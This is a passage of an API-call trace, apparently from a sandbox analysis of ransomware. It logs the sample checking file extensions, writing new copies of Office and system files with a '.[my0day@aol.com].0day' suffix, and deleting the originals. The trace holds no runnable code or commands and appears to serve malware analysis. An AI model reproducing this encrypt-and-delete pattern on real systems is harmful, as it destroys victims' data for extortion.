[0266.727] lstrlenW (lpString=".jpg") returned 4 [0266.728] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0266.728] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0266.728] lstrlenW (lpString="osknumpadbase.xml") returned 17 [0266.728] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0266.728] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=1437) returned 1 [0266.728] CloseHandle (hObject=0x308) returned 1 [0266.728] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml")) returned 0x20 [0266.728] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.728] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.728] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 92 [0266.728] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 92 [0266.728] lstrlenW (lpString=".doc") returned 4 [0266.728] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0266.728] lstrlenW (lpString=".docx") returned 5 [0266.728] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0266.728] lstrlenW (lpString=".pdf") returned 4 [0266.728] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0266.728] lstrlenW (lpString=".xls") returned 4 [0266.728] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0266.728] lstrlenW (lpString=".xlsx") returned 5 [0266.728] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0266.728] lstrlenW (lpString=".ppt") returned 4 [0266.728] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0266.729] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 92 [0266.729] lstrlenW (lpString=".zip") returned 4 [0266.729] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0266.729] lstrlenW (lpString=".rar") returned 4 [0266.729] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0266.729] lstrlenW (lpString=".bz2") returned 4 [0266.729] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0266.729] lstrlenW (lpString=".7z") returned 3 [0266.729] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0266.729] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml") returned 92 [0266.729] lstrlenW (lpString=".dbf") returned 4 [0266.729] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0266.736] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0266.736] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0266.737] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0266.737] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0268.860] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0268.860] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0268.860] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0268.861] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0268.862] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0268.862] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0268.863] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0268.864] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0268.864] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0268.865] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0269.205] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.205] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00148_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0269.228] GetLastError () returned 0x0 [0269.228] ReadFile (in: hFile=0x300, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x6a0, lpOverlapped=0x0) returned 1 [0269.233] WriteFile (in: hFile=0x318, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0x6b0, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0x6b0, lpOverlapped=0x0) returned 1 [0269.234] ReadFile (in: hFile=0x300, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.234] WriteFile (in: hFile=0x318, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.234] SetEndOfFile (hFile=0x318) returned 1 [0269.234] CloseHandle (hObject=0x318) returned 1 [0269.234] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.234] SetEndOfFile (hFile=0x300) returned 1 [0269.237] CloseHandle (hObject=0x300) returned 1 [0269.237] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0269.240] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00148_.wmf")) returned 1 [0269.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63 [0269.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63 [0269.240] lstrlenW (lpString=".doc") returned 4 [0269.240] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.240] lstrlenW (lpString=".docx") returned 5 [0269.240] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.240] lstrlenW (lpString=".pdf") returned 4 [0269.240] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.240] lstrlenW (lpString=".xls") returned 4 [0269.240] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.240] lstrlenW (lpString=".xlsx") returned 5 [0269.240] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.240] lstrlenW (lpString=".ppt") returned 4 [0269.240] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63 [0269.240] lstrlenW (lpString=".zip") returned 4 [0269.240] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.240] lstrlenW (lpString=".rar") returned 4 [0269.240] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.240] lstrlenW (lpString=".bz2") returned 4 [0269.240] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.240] lstrlenW (lpString=".7z") returned 3 [0269.240] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63 [0269.240] lstrlenW (lpString=".dbf") returned 4 [0269.240] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63 [0269.241] lstrlenW (lpString=".1cd") returned 4 [0269.241] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63 [0269.241] lstrlenW (lpString=".jpg") returned 4 [0269.241] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63 [0269.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63 [0269.241] lstrlenW (lpString=".doc") returned 4 [0269.241] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.241] lstrlenW (lpString=".docx") returned 5 [0269.241] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.241] lstrlenW (lpString=".pdf") returned 4 [0269.241] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.241] lstrlenW (lpString=".xls") returned 4 [0269.241] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.241] lstrlenW (lpString=".xlsx") returned 5 [0269.241] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.241] lstrlenW (lpString=".ppt") returned 4 [0269.241] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63 [0269.241] lstrlenW (lpString=".zip") returned 4 [0269.241] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.241] lstrlenW (lpString=".rar") returned 4 [0269.241] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.241] lstrlenW (lpString=".bz2") returned 4 [0269.241] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.241] lstrlenW (lpString=".7z") returned 3 [0269.241] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63 [0269.241] lstrlenW (lpString=".dbf") returned 4 [0269.241] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63 [0269.242] lstrlenW (lpString=".1cd") returned 4 [0269.242] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63 [0269.242] lstrlenW (lpString=".jpg") returned 4 [0269.242] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.242] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0269.242] lstrlenW (lpString="BL00195_.WMF") returned 12 [0269.242] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0269.243] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=8070) returned 1 [0269.243] CloseHandle (hObject=0x318) returned 1 [0269.243] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf")) returned 0x20 [0269.243] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.244] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0269.244] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.244] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.244] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0269.245] GetLastError () returned 0x0 [0269.245] ReadFile (in: hFile=0x318, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x1f86, lpOverlapped=0x0) returned 1 [0269.247] WriteFile (in: hFile=0x354, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0x1f90, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0x1f90, lpOverlapped=0x0) returned 1 [0269.248] ReadFile (in: hFile=0x318, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.248] WriteFile (in: hFile=0x354, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.248] SetEndOfFile (hFile=0x354) returned 1 [0269.248] CloseHandle (hObject=0x354) returned 1 [0269.248] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.248] SetEndOfFile (hFile=0x318) returned 1 [0269.251] CloseHandle (hObject=0x318) returned 1 [0269.251] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0269.251] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf")) returned 1 [0269.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63 [0269.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63 [0269.251] lstrlenW (lpString=".doc") returned 4 [0269.252] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.252] lstrlenW (lpString=".docx") returned 5 [0269.252] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.252] lstrlenW (lpString=".pdf") returned 4 [0269.252] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.252] lstrlenW (lpString=".xls") returned 4 [0269.252] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.252] lstrlenW (lpString=".xlsx") returned 5 [0269.252] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.252] lstrlenW (lpString=".ppt") returned 4 [0269.252] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.252] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63 [0269.252] lstrlenW (lpString=".zip") returned 4 [0269.252] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.252] lstrlenW (lpString=".rar") returned 4 [0269.252] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.253] lstrlenW (lpString=".bz2") returned 4 [0269.253] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.253] lstrlenW (lpString=".7z") returned 3 [0269.253] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63 [0269.253] lstrlenW (lpString=".dbf") returned 4 [0269.253] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63 [0269.253] lstrlenW (lpString=".1cd") returned 4 [0269.253] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63 [0269.253] lstrlenW (lpString=".jpg") returned 4 [0269.253] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63 [0269.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63 [0269.253] lstrlenW (lpString=".doc") returned 4 [0269.253] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.253] lstrlenW (lpString=".docx") returned 5 [0269.253] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.253] lstrlenW (lpString=".pdf") returned 4 [0269.253] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.253] lstrlenW (lpString=".xls") returned 4 [0269.253] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.253] lstrlenW (lpString=".xlsx") returned 5 [0269.253] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.253] lstrlenW (lpString=".ppt") returned 4 [0269.253] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.253] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63 [0269.253] lstrlenW (lpString=".zip") returned 4 [0269.254] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.254] lstrlenW (lpString=".rar") returned 4 [0269.254] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.254] lstrlenW (lpString=".bz2") returned 4 [0269.254] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.254] lstrlenW (lpString=".7z") returned 3 [0269.254] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63 [0269.254] lstrlenW (lpString=".dbf") returned 4 [0269.254] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63 [0269.254] lstrlenW (lpString=".1cd") returned 4 [0269.254] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 63 [0269.254] lstrlenW (lpString=".jpg") returned 4 [0269.254] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.254] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0269.254] lstrlenW (lpString="BL00234_.WMF") returned 12 [0269.254] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 